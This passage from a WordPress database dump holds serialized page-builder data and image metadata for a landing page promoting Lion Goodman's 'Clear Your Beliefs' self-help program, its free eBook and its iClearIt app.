you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1014, 1520, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:320:"<center>\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/video-shadow.png''); repeat: no-repeat; width:780px;height:471px;padding-top:16px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:341:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p>[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:851:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever<br />Is In The Way Right<br/>Now</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:706:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center><p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1015, 1521, '_wp_attached_file', '2014/10/v-shadow-2.png'),
(1016, 1521, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:730;s:6:"height";i:441;s:4:"file";s:22:"2014/10/v-shadow-2.png";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"v-shadow-2-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:22:"v-shadow-2-300x181.png";s:5:"width";i:300;s:6:"height";i:181;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:22:"v-shadow-2-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:22:"v-shadow-2-400x400.png";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:22:"v-shadow-2-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:22:"v-shadow-2-672x372.png";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1017, 1521, '_edit_lock', '1412914004:2'),
(1020, 1522, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:345:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p>[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1021, 1523, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:344:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center>[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your 